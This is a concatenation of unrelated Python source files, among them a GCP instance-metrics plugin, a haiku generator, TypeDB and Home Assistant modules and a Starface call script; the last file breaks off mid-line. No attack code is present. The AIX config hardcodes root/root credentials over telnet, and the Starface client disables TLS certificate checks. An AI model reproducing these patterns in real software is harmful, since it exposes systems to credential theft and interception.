instance['properties']['machineType'] = instance_details['machineType'] instance['properties']['status'] = instance_details['status'] instance['properties']['cpuPlatform'] = instance_details['cpuPlatform'] instance['properties']['link'] = instance_details['selfLink'] nic_counter = 0 for instance_nic in instance_details['networkInterfaces']: key = 'nic_' + str(nic_counter) + '_name' instance['properties'][key] = instance_nic['name'] key = 'nic_' + str(nic_counter) + '_ip' instance['properties'][key] = instance_nic['networkIP'] access_config_counter = 0 for accessConfig in instance_nic['accessConfigs']: key = 'nic_' + str(nic_counter) + '_accessConfig_' + str(access_config_counter) + '_ip' instance['properties'][key] = accessConfig['natIP'] access_config_counter = access_config_counter + 1 nic_counter = nic_counter + 1 return list_of_instances def create_group(self, group_id, group_name, project_id): extended_group_id = group_id + "_" + project_id extended_group_name = group_name + " (" + project_id + ")" self.log("- group id='{}', name='{}'".format(extended_group_id, extended_group_name)) if self.debug: group = None else: group = self.topology_builder.create_group(extended_group_id, extended_group_name) return group def report_metrics(self, group, list_of_instances): for instance in list_of_instances: self.log("--- element '{}', '{}'".format(instance['instance_id'], instance['instance_name'])) if not self.debug: element = group.create_element(instance['instance_id'], instance['instance_name']) for key,value in instance['properties'].items(): self.log("---- element_property {}={}".format(key, value)) # consider endpoints to add to element containsIpAddress = re.match(".*_ip$", key) if containsIpAddress: self.log("---- endpoint {}".format(value)) if not self.debug: element.add_endpoint(value, 0) if not self.debug: element.report_property(key, value) for key, value in instance['metrics'].items(): self.log("----- absolute {}={}".format(key, value['value'])) if not self.debug: element.absolute(key=key, value=value['value']) def query(self, **kwargs): project_jwt_json = json.loads(self.project_jwt) list_of_instances = self.get_instances(project_jwt_json) list_of_instances = self.get_instance_details(list_of_instances, project_jwt_json) group = self.create_group("ComputeEngine", "Compute Engine", project_jwt_json["project_id"]) self.report_metrics(group, list_of_instances) #class Test: # @staticmethod # def test(): # plugin = RemoteGCPPlugin() # # with open('gcp-project.json') as project_jwt_json: # project_jwt = json.load(project_jwt_json) # kwargs = {'debug': True, 'config': { 'project_jwt' : str(project_jwt)}} # # plugin.initialize(**kwargs) # plugin.query() # #if __name__ == "__main__": # Test.test()
"""Produce new haiku from training corpus of existing haiku.""" import sys import logging import random import json from collections import defaultdict from generate_corpus_missing_words.count_syllables import count_syllables from string import punctuation logging.disable(logging.CRITICAL) # comment-out to enable debugging messages logging.basicConfig(level=logging.DEBUG, format='%(message)s') def load_corpus(): """Load the corpus as a string.""" with open('generate_corpus_missing_words/corpus.json') as f_obj: corpus = json.load(f_obj) return corpus def map_word_to_word(corpus): """Load list & use dictionary to map word to word that follows.""" limit = len(corpus)-1 dict1_to_1 = defaultdict(list) for index, word in enumerate(corpus): if index < limit: suffix = corpus[index + 1] dict1_to_1[word].append(suffix) logging.debug("map_word_to_word results for \"sake\" = %s\n", dict1_to_1['sake']) return dict1_to_1 def map_2_words_to_word(corpus): """Load list & use dictionary to map word-pair to trailing word.""" limit = len(corpus)-2 dict2_to_1 = defaultdict(list) for index, word in enumerate(corpus): if index < limit: key = word + ' ' + corpus[index + 1] suffix = corpus[index + 2] dict2_to_1[key].append(suffix) logging.debug("map_2_words_to_word results for \"sake jug\" = %s\n", dict2_to_1['sake jug']) return dict2_to_1 def random_word(corpus): """Return random word and syllable count from training corpus.""" word = random.choice(corpus) num_syls = count_syllables(word) if num_syls > 4: random_word(corpus) else: logging.debug("random word & syllables = %s %s\n", word, num_syls) return (word, num_syls) def word_after_single(prefix, suffix_map_1, current_syls, target_syls): """Return all acceptable words in a corpus that follow a single word.""" accepted_words = [] suffixes = suffix_map_1.get(prefix) if suffixes is not None: for candidate in suffixes: num_syls = count_syllables(candidate) if current_syls + num_syls <= target_syls: accepted_words.append(candidate) logging.debug("accepted words after \"%s\" = %s\n", prefix, set(accepted_words)) return accepted_words def word_after_double(prefix, suffix_map_2, current_syls, target_syls): """Return all acceptable words in a corpus that follow a word pair.""" accepted_words = [] suffixes = suffix_map_2.get(prefix) if suffixes is not None: for candidate in suffixes: num_syls = count_syllables(candidate) if current_syls + num_syls <= target_syls: accepted_words.append(candidate) logging.debug("accepted words after \"%s\" = %s\n", prefix, set(accepted_words)) return accepted_words def haiku_line(suffix_map_1, suffix_map_2, corpus, end_prev_line, target_syls): """Build a haiku line from a training corpus and return it.""" line = '2/3' line_syls = 0 current_line = [] if len(end_prev_line) == 0: # build first line line = '1' word, num_syls = random_word(corpus) current_line.append(word) line_syls += num_syls word_choices = word_after_single(word, suffix_map_1, line_syls, target_syls) while len(word_choices) == 0: prefix = random.choice(corpus) logging.debug("new random prefix = %s", prefix) word_choices = word_after_single(prefix, suffix_map_1, line_syls, target_syls) word = random.choice(word_choices) num_syls = count_syllables(word) logging.debug("word & syllables = %s %s", word, num_syls) line_syls += num_syls current_line.append(word) if line_syls == target_syls: end_prev_line.extend(current_line[-2:]) return current_line, end_prev_line else: # build lines 2 & 3 current_line.extend(end_prev_line) while True: logging.debug("line = %s\n", line) prefix = current_line[-2] + ' ' + current_line[-1] word_choices = word_after_double(prefix, suffix_map_2, line_syls, target_syls) while len(word_choices) == 0: index = random.randint(0, len(corpus) - 2) prefix = corpus[index] + ' ' + corpus[index + 1] logging.debug("new random prefix = %s", prefix) word_choices = word_after_double(prefix, suffix_map_2, line_syls, target_syls) word = random.choice(word_choices) num_syls = count_syllables(word) logging.debug("word & syllables = %s %s", word, num_syls) if line_syls + num_syls > target_syls: continue elif line_syls + num_syls < target_syls: current_line.append(word) line_syls += num_syls elif line_syls + num_syls == target_syls: current_line.append(word) break end_prev_line = [] end_prev_line.extend(current_line[-2:]) if line == '1': final_line = current_line[:] else: final_line = current_line[2:] return final_line, end_prev_line def main(): """Give user choice of building a haiku or modifying an existing haiku.""" intro = """\n A thousand monkeys at a thousand typewriters... or one computer...can sometimes produce a haiku.\n""" print("{}".format(intro)) corpus = load_corpus() suffix_map_1 = map_word_to_word(corpus) suffix_map_2 = map_2_words_to_word(corpus) final = [] choice = None while choice != "0": print( """ Japanese Haiku Generator 0 - Quit 1 - Generate a Haiku poem 2 - Regenerate Line 2 3 - Regenerate Line 3 """ ) choice = input("Choice: ") print() # exit if choice == "0": print("Sayonara.") sys.exit() # generate a full haiku elif choice == "1": final = [] end_prev_line = [] first_line, end_prev_line1 = haiku_line(suffix_map_1, suffix_map_2, corpus, end_prev_line, 5) final.append(first_line) line, end_prev_line2 = haiku_line(suffix_map_1, suffix_map_2, corpus, end_prev_line1, 7) final.append(line) line, end_prev_line3 = haiku_line(suffix_map_1, suffix_map_2, corpus, end_prev_line2, 5) final.append(line) # regenerate line 2 elif choice == "2": if not final: print("Please generate a full haiku first (Option 1).") continue else: line, end_prev_line2 = haiku_line(suffix_map_1, suffix_map_2, corpus, end_prev_line1, 7) final[1] = line # regenerate line 3 elif choice == "3": if not final: print("Please generate a full haiku first (Option 1).") continue else: line, end_prev_line3 = haiku_line(suffix_map_1, suffix_map_2, corpus, end_prev_line2, 5) final[2] = line # some unknown choice else: print("\nSorry, but that isn't a valid choice.", file=sys.stderr) continue # display results print() print("First line = " + ' '.join(final[0]), file=sys.stderr) print("Second line = " + ' '.join(final[1]), file=sys.stderr) print("Third line = " + ' '.join(final[2]), file=sys.stderr) print() input("\n\nPress the Enter key to exit.") if __name__ == '__main__': main()
"""A pub/sub Bus for managing states and transitions. The 'process' subpackage defines a ProcessBus object, which is used to connect applications, servers, and frameworks with site-wide services such as daemonization, process reload, signal handling, drop privileges, PID file management, logging for all of these, and many more. The 'plugins' subpackage defines a few abstract and concrete services for use with a Bus. Some use custom channels; see the documentation for each class. """ from magicbus.base import ChannelFailures try: from magicbus.win32 import Win32Bus as Bus, Win32ProcessBus as ProcessBus except ImportError: from magicbus.base import Bus from magicbus.process import ProcessBus bus = ProcessBus() __all__ = ['ChannelFailures', 'Bus', 'ProcessBus', 'bus']
# # Copyright (C) 2021 Vaticle # # Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. # from abc import ABC from typing import TYPE_CHECKING, Union import typedb_protocol.common.transaction_pb2 as transaction_proto from typedb.api.concept.type.type import Type, RemoteType from typedb.common.exception import TypeDBClientException, MISSING_LABEL, MISSING_TRANSACTION from typedb.common.label import Label from typedb.common.rpc.request_builder import type_set_label_req, type_is_abstract_req, type_get_supertype_req, \ type_get_supertypes_req, type_get_subtypes_req, type_delete_req from typedb.concept.concept import _Concept, _RemoteConcept from typedb.concept.proto import concept_proto_reader if TYPE_CHECKING: from typedb.api.connection.transaction import TypeDBTransaction, _TypeDBTransactionExtended class _Type(Type, _Concept, ABC): def __init__(self, label: Label, is_root: bool): if not label: raise TypeDBClientException.of(MISSING_LABEL) self._label = label self._is_root = is_root self._hash = hash(label) def get_label(self): return self._label def is_root(self): return self._is_root def as_type(self) -> "Type": return self def __str__(self): return type(self).__name__ + "[label: %s]" % self.get_label() def __eq__(self, other): if other is self: return True if not other or type(self) != type(other): return False return self.get_label() == other.get_label() def __hash__(self): return self._hash class _RemoteType(RemoteType, _RemoteConcept, ABC): def __init__(self, transaction: Union["_TypeDBTransactionExtended", "TypeDBTransaction"], label: Label, is_root: bool): if not transaction: raise TypeDBClientException.of(MISSING_TRANSACTION) if not label: raise TypeDBClientException.of(MISSING_LABEL) self._transaction_ext = transaction self._label = label self._is_root = is_root self._hash = hash((self._transaction_ext, label)) def get_label(self): return self._label def is_root(self): return self._is_root def as_type(self) -> "RemoteType": return self def set_label(self, new_label: str): self.execute(type_set_label_req(self.get_label(), new_label)) self._label = new_label self._hash = hash((self._transaction_ext, new_label)) def is_abstract(self): return self.execute(type_is_abstract_req(self.get_label())).type_is_abstract_res.abstract def get_supertype(self): res = self.execute(type_get_supertype_req(self.get_label())).type_get_supertype_res return concept_proto_reader.type_(res.type) if res.WhichOneof("res") == "type" else None def get_supertypes(self): return (concept_proto_reader.type_(t) for rp in self.stream(type_get_supertypes_req(self.get_label())) for t in rp.type_get_supertypes_res_part.types) def get_subtypes(self): return (concept_proto_reader.type_(t) for rp in self.stream(type_get_subtypes_req(self.get_label())) for t in rp.type_get_subtypes_res_part.types) def delete(self): self.execute(type_delete_req(self.get_label())) def execute(self, request: transaction_proto.Transaction.Req): return self._transaction_ext.execute(request).type_res def stream(self, request: transaction_proto.Transaction.Req): return (rp.type_res_part for rp in self._transaction_ext.stream(request)) def __str__(self): return type(self).__name__ + "[label: %s]" % self.get_label() def __eq__(self, other): if other is self: return True if not other or type(self) != type(other): return False return self._transaction_ext is other._transaction_ext and self.get_label() == other.get_label() def __hash__(self): return self._hash
#!/usr/bin/env python3 # coding: utf8 # Author: Lenz Furrer, 2017 ''' Loaders and formatters for the BeCalm TIPS formats. ''' import json import codecs import logging from urllib import request as url_request from .document import Article, Section from .load import DocIterator from .export import StreamFormatter # ======== # # Loaders. # # ======== # class _BeCalmFetcher(DocIterator): ''' Fetch documents from BeCalm's servers. ''' domain = None url = None textfield = None def iter_documents(self, source): ''' Iterate over documents from a BeCalm server. ''' return self._iter_documents(source) def _iter_documents(self, docids): if not isinstance(docids, (tuple, list)): docids = list(docids) if not docids: raise ValueError('Empty doc-ID list.') query = json.dumps({self.domain: docids}).encode('ascii') headers = {'Content-Type': 'application/json'} logging.info("POST request to BeCalm's server with the query %s", query) req = url_request.Request(self.url, data=query, headers=headers) with url_request.urlopen(req) as f: docs = json.load(codecs.getreader('utf-8')(f)) for doc in docs: yield self._document(doc) def _document(self, doc): id_ = doc['externalId'] title = doc['title'] text = doc[self.textfield] article = Article(id_, tokenizer=self.config.text_processor) article.add_section('Title', title) article.add_section('Abstract', text) return article class BeCalmAbstractFetcher(_BeCalmFetcher): ''' Fetch abstracts from BeCalm's abstract server. ''' domain = 'abstracts' url = 'http://193.147.85.10:8088/abstractserver/json' textfield = 'text' class BeCalmPatentFetcher(_BeCalmFetcher): ''' Fetch patent abstracts from BeCalm's patent server. ''' domain = 'patents' url = 'http://193.147.85.10:8087/patentserver/json' textfield = 'abstractText' # =========== # # Formatters. # # =========== # class _BeCalmFormatter(StreamFormatter): ''' Common basis for BeCalm's specific output formats. ''' fields = ('document_id', 'section', 'init', 'end', 'score', 'annotated_text', 'type', 'database_id') @staticmethod def _iter_entries(content): ''' Iterate over entries needed for BeCalm's output formats. ''' for section in content.get_subelements(Section): article_id = section.article.id_ section_type = 'T' if section.type_.lower() == 'title' else 'A' for entity in section.iter_entities(): yield ( article_id, section_type, entity.start, entity.end, 0.5, # dummy score entity.text, entity.type, entity.cid, ) class BeCalmTSVFormatter(_BeCalmFormatter): ''' BeCalm's TSV format for the TIPS challenge. ''' ext = 'tsv' template = '{}\t{}\t{}\t{}\t{}\t{}\t{}\n' def write(self, stream, content): if self.config.p.include_header: stream.write(self.template.format(*(f.upper() for f in self.fields))) for entry in self._iter_entries(content): stream.write(self.template.format(*entry)) class BeCalmJSONFormatter(_BeCalmFormatter): ''' BeCalm's JSON format for the TIPS challenge. ''' ext = 'json' def write(self, stream, content): stream.write('[\n') need_comma = False # comma needed before all but the first entry for entry in self._iter_entries(content): if need_comma: stream.write(',\n') else: need_comma = True json.dump(dict(zip(self.fields, entry)), stream, indent=4) stream.write('\n]')
#!/usr/bin/env python #-*- coding: utf-8 -*- """ 把一些人去操作的时候不会关心的配置参数定义在这里。 而如IP、用户名、密码等属性,人工操作也需要的,则通过函数接口传入 """ #NIM NIM_prompt='#' NIM_port=23 #VIO #each VIOServer config should be the same VIOServer_prompt='$' VIOServer_port=23 #HMC HMC_prompt='hscroot@localhost:~>' HMC_port=22 #AIX Common AIX_TelnetPort=23 AIX_Cmd_prompt='#' AIX_Default_Username='root' AIX_Default_Passwd='root'
# Generated by Django 3.1.11 on 2021-07-20 08:22 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('schools', '0006_auto_20210713_1029'), ] operations = [ migrations.AlterField( model_name='school', name='zip_city', field=models.CharField(blank=True, max_length=15), ), ]
import time import os # from lucent.optvis.objectives import channel from lucent.optvis.render import render_vis, tensor_to_img_array import numpy as np from PIL import Image import streamlit as st import torch from lucent.interface.utils import join_layer_channel, update_image_db, display_image, init, create_model_list def update_identifier(): st.session_state.identifier = join_layer_channel(st.session_state.layer, st.session_state.channel) if 'layer_names' not in st.session_state: st.session_state['layer_names'] = [] with st.sidebar: with st.form('config'): st.write('## Config') st.selectbox( 'Model', options=create_model_list(), key='model_name', index=0, ) st.text_input('Data directory', value='/home/aric/Pictures/', key='datadir') st.checkbox('Load images from data dir', value=True, key='load_data') submitted = st.form_submit_button("Save config") if submitted: print(f'\n{st.session_state.layer = }, {st.session_state.channel = }\n') st.session_state.model = init(st.session_state.model_name) st.write('Config saved!') # this should have a disabled keyword but somehow doesn't yet --> maybe code on github needs to be pushed to package manager first st.checkbox("Save images to data dir (won't work if loading images)", value=False, key='save_data') st.selectbox('layer', options=st.session_state.layer_names, key='layer', on_change=update_identifier, index=0) st.text_input('channel', value='1', key='channel', on_change=update_identifier) # init and update data base of features if 'database' not in st.session_state: st.session_state['database'] = dict() # init identifier if 'identifier' not in st.session_state: st.session_state['identifier'] = None if 'model' not in st.session_state: st.session_state['model'] = None if 'layer' not in st.session_state: st.session_state['layer'] = None if st.session_state.load_data: update_image_db(st.session_state.datadir, st.session_state.model_name) st.button('Generate/Load image', on_click=display_image, args=(st.session_state.model, st.session_state.identifier,))
from __future__ import division from __future__ import print_function from scipy.stats import norm import numpy as np from . import common_args from ..util import read_param_file def analyze(problem, X, Y, num_resamples=1000, conf_level=0.95, print_to_console=False): """Calculates Derivative-based Global Sensitivity Measure on model outputs. Returns a dictionary with keys 'vi', 'vi_std', 'dgsm', and 'dgsm_conf', where each entry is a list of size D (the number of parameters) containing the indices in the same order as the parameter file. Parameters ---------- problem : dict The problem definition X : numpy.matrix The NumPy matrix containing the model inputs Y : numpy.array The NumPy array containing the model outputs num_resamples : int The number of resamples used to compute the confidence intervals (default 1000) conf_level : float The confidence interval level (default 0.95) print_to_console : bool Print results directly to console (default False) References ---------- .. [1] Sobol, I. M. and S. Kucherenko (2009). "Derivative based global sensitivity measures and their link with global sensitivity indices." Mathematics and Computers in Simulation, 79(10):3009-3017, doi:10.1016/j.matcom.2009.01.023. """ D = problem['num_vars'] if Y.size % (D + 1) == 0: N = int(Y.size / (D + 1)) else: raise RuntimeError("Incorrect number of samples in model output file.") if not 0 < conf_level < 1: raise RuntimeError("Confidence level must be between 0-1.") base = np.zeros(N) X_base = np.zeros((N, D)) perturbed = np.zeros((N, D)) X_perturbed = np.zeros((N, D)) step = D + 1 base = Y[0:Y.size:step] X_base = X[0:Y.size:step, :] for j in range(D): perturbed[:, j] = Y[(j + 1):Y.size:step] X_perturbed[:, j] = X[(j + 1):Y.size:step, j] # First order (+conf.) and Total order (+conf.) keys = ('vi', 'vi_std', 'dgsm', 'dgsm_conf') S = dict((k, np.zeros(D)) for k in keys) if print_to_console: print("Parameter %s %s %s %s" % keys) for j in range(D): S['vi'][j], S['vi_std'][j] = calc_vi( base, perturbed[:, j], X_perturbed[:, j] - X_base[:, j]) S['dgsm'][j], S['dgsm_conf'][j] = calc_dgsm(base, perturbed[:, j], X_perturbed[ :, j] - X_base[:, j], problem['bounds'][j], num_resamples, conf_level) if print_to_console: print("%s %f %f %f %f" % ( problem['names'][j], S['vi'][j], S['vi_std'][j], S['dgsm'][j], S['dgsm_conf'][j])) return S def calc_vi(base, perturbed, x_delta): # v_i sensitivity measure following Sobol and Kucherenko (2009) # For comparison, Morris mu* < sqrt(v_i) dfdx = (perturbed - base) / x_delta dfdx2 = dfdx ** 2 return np.mean(dfdx2), np.std(dfdx2) def calc_dgsm(base, perturbed, x_delta, bounds, num_resamples, conf_level): # v_i sensitivity measure following Sobol and Kucherenko (2009) # For comparison, total order S_tot <= dgsm D = np.var(base) vi, _ = calc_vi(base, perturbed, x_delta) dgsm = vi * (bounds[1] - bounds[0]) ** 2 / (D * np.pi ** 2) s = np.zeros(num_resamples) for i in range(num_resamples): r = np.random.randint(len(base), size=len(base)) s[i], _ = calc_vi(base[r], perturbed[r], x_delta[r]) return dgsm, norm.ppf(0.5 + conf_level / 2) * s.std(ddof=1) if __name__ == "__main__": parser = common_args.create() parser.add_argument('-X', '--model-input-file', type=str, required=True, default=None, help='Model input file') parser.add_argument('-r', '--resamples', type=int, required=False, default=1000, help='Number of bootstrap resamples for Sobol confidence intervals') args = parser.parse_args() problem = read_param_file(args.paramfile) Y = np.loadtxt(args.model_output_file, delimiter=args.delimiter, usecols=(args.column,)) X = np.loadtxt(args.model_input_file, delimiter=args.delimiter, ndmin=2) if len(X.shape) == 1: X = X.reshape((len(X), 1)) analyze(problem, X, Y, num_resamples=args.resamples, print_to_console=True)
''' 144. Binary Tree Preorder Traversal Easy Given the root of a binary tree, return the preorder traversal of its nodes' values. Example 1: Input: root = [1,null,2,3] Output: [1,2,3] Example 2: Input: root = [] Output: [] Example 3: Input: root = [1] Output: [1] Example 4: Input: root = [1,2] Output: [1,2] Example 5: Input: root = [1,null,2] Output: [1,2] Constraints: The number of nodes in the tree is in the range [0, 100]. -100 <= Node.val <= 100 '''# Definition for a binary tree node. # class TreeNode: # def __init__(self, val=0, left=None, right=None): # self.val = val # self.left = left # self.right = right class Solution: def preorderTraversal(self, root: TreeNode) -> List[int]: self.ans = [] #self.recursive(root) self.iterative(root) return self.ans def recursive(self, node): if not node: return self.ans.append(node.val) self.recursive(node.left) self.recursive(node.right) def iterative(self, root): stack = [(root, False)] while(len(stack)>0): node, visted = stack.pop() if node: if visted: self.ans.append(node.val) else: # Note: Right leaf first due to using a stack # Preorder, Root, left, right stack.append((node.right, False)) stack.append((node.left, False)) stack.append((node, True))
# -*- coding: utf-8 -*- import aiohttp from aiohttp import web import argparse import asyncio import concurrent.futures import io import os from .data import Data # Local resources HERE = os.path.dirname(os.path.realpath(__file__)) INDEX_HTML = os.path.join(HERE, 'index.html') D3_JS = os.path.join(HERE, 'd3.v4.min.js') # Handler factory for static files def static_handler(path): async def handler(request): return web.FileResponse(path) return handler # Acquire sample async def get_api_annotation(request): data = request.app['data'] payload = await data.get_next_sample() return web.json_response(payload) # Save annotation result async def post_api_annotation(request): data = request.app['data'] payload = await request.json() result = await data.add_annotation(payload) return web.json_response(result) # Run service def run(host, port, metadata_path, image_folder, annotation_path): with concurrent.futures.ThreadPoolExecutor(max_workers=4) as executor: # Create application app = web.Application() app.add_routes([ web.get('/', static_handler(INDEX_HTML)), web.get('/d3.v4.min.js', static_handler(D3_JS)), web.get('/api/annotation', get_api_annotation), web.post('/api/annotation', post_api_annotation) ]) app['executor'] = executor app['data'] = Data(metadata_path, image_folder, annotation_path, executor) app['annotation_path'] = annotation_path # Start server runner = web.AppRunner(app) loop = asyncio.get_event_loop() async def start(): await runner.setup() site = web.TCPSite(runner, host, port) await site.start() loop.run_until_complete(start()) print(f'Running on {host}:{port}') # Run forever (hack to avoid blocking select on Windows with default loop) async def foo(): while True: await asyncio.sleep(1.0) try: loop.run_until_complete(foo()) except KeyboardInterrupt: pass # Cleanup loop.run_until_complete(runner.cleanup()) # Standalone usage if __name__ == '__main__': parser = argparse.ArgumentParser(description='Box annotator service') parser.add_argument('-H', '--host', nargs='?', default='0.0.0.0', help='Host address bound') parser.add_argument('-P', '--port', nargs='?', type=int, default=80, help='Port used') parser.add_argument('-M', '--metadata', nargs='?', default='./metadata.json', help='Metadata file') parser.add_argument('-I', '--images', nargs='?', default='./images/', help='Image folder') parser.add_argument('-A', '--annotation', nargs='?', default='./annotation.json', help='Annotation file') args = parser.parse_args() run(args.host, args.port, args.metadata, args.images, args.annotation)
from __future__ import absolute_import from __future__ import print_function import veriloggen.core.vtypes as vtypes import veriloggen.core.module as module def mkMultiplierCore(index, lwidth=32, rwidth=32, lsigned=True, rsigned=True, depth=6): if lwidth <= 0: raise ValueError("data width must be greater than 0.") if rwidth <= 0: raise ValueError("data width must be greater than 0.") if depth < 2: raise ValueError("depth must be greater than 1.") retwidth = lwidth + rwidth m = module.Module('multiplier_core_%d' % index) clk = m.Input('CLK') update = m.Input('update') a = m.Input('a', lwidth) b = m.Input('b', rwidth) c = m.Output('c', retwidth) _a = m.Reg('_a', lwidth, signed=lsigned) _b = m.Reg('_b', rwidth, signed=rsigned) _mul = m.Wire('_mul', retwidth, signed=True) _pipe_mul = [m.Reg('_pipe_mul%d' % i, retwidth, signed=True) for i in range(depth - 1)] __a = _a __b = _b if not lsigned: __a = vtypes.SystemTask( 'signed', vtypes.Cat(vtypes.Int(0, width=1), _a)) if not rsigned: __b = vtypes.SystemTask( 'signed', vtypes.Cat(vtypes.Int(0, width=1), _b)) m.Assign(_mul(__a * __b)) m.Assign(c(_pipe_mul[depth - 2])) m.Always(vtypes.Posedge(clk))( vtypes.If(update)( _a(a), _b(b), _pipe_mul[0](_mul), [_pipe_mul[i](_pipe_mul[i - 1]) for i in range(1, depth - 1)] )) return m def mkMultiplier(index, lwidth=32, rwidth=32, lsigned=True, rsigned=True, depth=6): if lwidth <= 0: raise ValueError("data width must be greater than 0.") if rwidth <= 0: raise ValueError("data width must be greater than 0.") if depth < 2: raise ValueError("depth must be greater than 1.") retwidth = lwidth + rwidth mult = mkMultiplierCore(index, lwidth, rwidth, lsigned, rsigned, depth) m = module.Module('multiplier_%d' % index) clk = m.Input('CLK') rst = m.Input('RST') update = m.Input('update') enable = m.Input('enable') valid = m.Output('valid') a = m.Input('a', lwidth) b = m.Input('b', rwidth) c = m.Output('c', retwidth) valid_reg = [m.Reg('valid_reg%d' % i) for i in range(depth)] m.Assign(valid(valid_reg[depth - 1])) m.Always(vtypes.Posedge(clk))( vtypes.If(rst)( [valid_reg[i](0) for i in range(depth)] ).Else( vtypes.If(update)( valid_reg[0](enable), [valid_reg[i](valid_reg[i - 1]) for i in range(1, depth)] ) )) ports = [('CLK', clk), ('update', update), ('a', a), ('b', b), ('c', c)] m.Instance(mult, 'mult', ports=ports) return m # global multiplier count index_count = 0 def get_mul(lwidth=32, rwidth=32, lsigned=True, rsigned=True, depth=6): global index_count mul = mkMultiplier(index_count, lwidth, rwidth, lsigned, rsigned, depth) index_count += 1 return mul def reset(): global index_count index_count = 0
#!/usr/bin/python import wgdata from wvtest import wvtest @wvtest.wvtest def EaterTest(): e = wgdata.Eater('abcdefg') wvtest.WVPASSEQ(e.Eat(2), 'ab') wvtest.WVEXCEPT(wgdata.DecodeError, e.Eat, 10) wvtest.WVPASSEQ(e.Unpack('!3s'), ('cde',)) wvtest.WVPASSEQ(e.Remainder(), 'fg') wvtest.WVPASSEQ(e.Remainder(), '') e = wgdata.Eater('\x01\x02\x03\x04\x05\x06') wvtest.WVPASSEQ(list(e.Iter('!H', 4)), [(0x0102,), (0x0304,)]) wvtest.WVPASSEQ(list(e.Iter('!B', 1)), [(0x05,)]) wvtest.WVEXCEPT(wgdata.DecodeError, lambda: list(e.Iter('!B', 2))) wvtest.WVPASSEQ(e.Remainder(), '\x06') if __name__ == '__main__': wvtest.wvtest_main()
import hashlib import os import logging import sys import xmlrpclib import ssl class StarfaceConfig(): def __init__(self, file): self.file = file self.__items = ['url', 'user', 'password', 'preferred_device'] self.url = None self.user = None self.password = None self.preferred_device = None self.__load(self.file) def __load(self, file): with open(file, 'r') as f: for item in self.__items: setattr(self, item, f.readline().rstrip()) index = 0 for item in self.__items[:-1]: index+=1 if not getattr(self, item): raise RuntimeError('Config item "{0}" missing (line number {1})'.format(item, index)) class StarfaceCaller(): def __init__(self, url, user, password): self.url = url self.user = user self.password = password self.proxy = xmlrpclib.ServerProxy(self.uri, verbose=False, use_datetime=True, context=ssl._create_unverified_context()) @property def uri(self): return '{0}/xml-rpc?de.vertico.starface.auth={1}'.format(self.url, self.auth) @property def auth(self): password = hashlib.sha512() password.update(self.password) auth = hashlib.sha512() auth.update(self.user) auth.update('*') auth.update(password.hexdigest().lower()) return '{0}:{1}'.format(self.user, auth.hexdigest()) def get_version(self): return self.proxy.ucp.v30.requests.system.getServerVersion() def place_call(self, number, preferred_device=''): login = self.proxy.ucp.v20.server.connection.login() if login: self.proxy.ucp.v20.server.communication.call.placeCall(number, preferred_device, '') self.proxy.ucp.v20.server.connection.logout() else: raise RuntimeError('Could not call login on starface') def main(): logging.basicConfig(level=logging.DEBUG) logger = logging.getLogger(__name__) import argparse name = os.path.basename(sys.argv[0]) parser = argparse.ArgumentParser(prog=name, usage='%(prog)s -n +49911777-777 [ -d SIP/dev ] [ -h ]') parser.add_argument('-n', '--number', dest='number', help='Call number') parser.add_argument('-d', '--device', dest='device', help='Place call on device, e.g. SIP/mydevice') parser.add_argument('-c', '--credential', dest='credential', help='Credential file', default='~/.starface_credentials') args = parser.parse_args() if not args.number: print('{0}: No argument "number" given'.format(name)) parser.print_usage() return 1 credential = os.path.expanduser(args.credential) logger.debug('Using credential file %s', credential) config = StarfaceConfig(credential) caller = StarfaceCaller(url=config.url, user=config.user, password=config.password) logger.debug('Starface Version: %s', caller.get_version()) preferred_device = '' if args.device: preferred_device = args.device elif config.preferred_device: preferred_device = config.preferred_device caller.place_call(args.number, preferred_device) return 0; if __name__ == '__main__': sys.exit(main())
"""Support for Freedompro cover.""" import json from pyfreedompro import put_state from homeassistant.components.cover import ( ATTR_POSITION, CoverDeviceClass, CoverEntity, CoverEntityFeature, ) from homeassistant.config_entries import ConfigEntry from homeassistant.const import CONF_API_KEY from homeassistant.core import HomeAssistant, callback from homeassistant.helpers import aiohttp_client from homeassistant.helpers.entity import DeviceInfo from homeassistant.helpers.entity_platform import AddEntitiesCallback from homeassistant.helpers.update_coordinator import CoordinatorEntity from .const import DOMAIN DEVICE_CLASS_MAP = { "windowCovering": CoverDeviceClass.BLIND, "gate": CoverDeviceClass.GATE, "garageDoor": CoverDeviceClass.GARAGE, "door": CoverDeviceClass.DOOR, "window": CoverDeviceClass.WINDOW, } SUPPORTED_SENSORS = {"windowCovering", "gate", "garageDoor", "door", "window"} async def async_setup_entry( hass: HomeAssistant, entry: ConfigEntry, async_add_entities: AddEntitiesCallback ) -> None: """Set up Freedompro cover.""" api_key = entry.data[CONF_API_KEY] coordinator = hass.data[DOMAIN][entry.entry_id] async_add_entities( Device(hass, api_key, device, coordinator) for device in coordinator.data if device["type"] in SUPPORTED_SENSORS ) class Device(CoordinatorEntity, CoverEntity): """Representation of an Freedompro cover.""" def __init__(self, hass, api_key, device, coordinator): """Initialize the Freedompro cover.""" super().__init__(coordinator) self._session = aiohttp_client.async_get_clientsession(hass) self._api_key = api_key self._attr_name = device["name"] self._attr_unique_id = device["uid"] self._attr_device_info = DeviceInfo( identifiers={ (DOMAIN, self.unique_id), }, manufacturer="Freedompro", model=device["type"], name=self.name, ) self._attr_current_cover_position = 0 self._attr_is_closed = True self._attr_supported_features = ( CoverEntityFeature.CLOSE | CoverEntityFeature.OPEN | CoverEntityFeature.SET_POSITION ) self._attr_device_class = DEVICE_CLASS_MAP[device["type"]] @callback def _handle_coordinator_update(self) -> None: """Handle updated data from the coordinator.""" device = next( ( device for device in self.coordinator.data if device["uid"] == self.unique_id ), None, ) if device is not None and "state" in device: state = device["state"] if "position" in state: self._attr_current_cover_position = state["position"] if self._attr_current_cover_position == 0: self._attr_is_closed = True else: self._attr_is_closed = False super()._handle_coordinator_update() async def async_added_to_hass(self) -> None: """When entity is added to hass.""" await super().async_added_to_hass() self._handle_coordinator_update() async def async_open_cover(self, **kwargs): """Open the cover.""" await 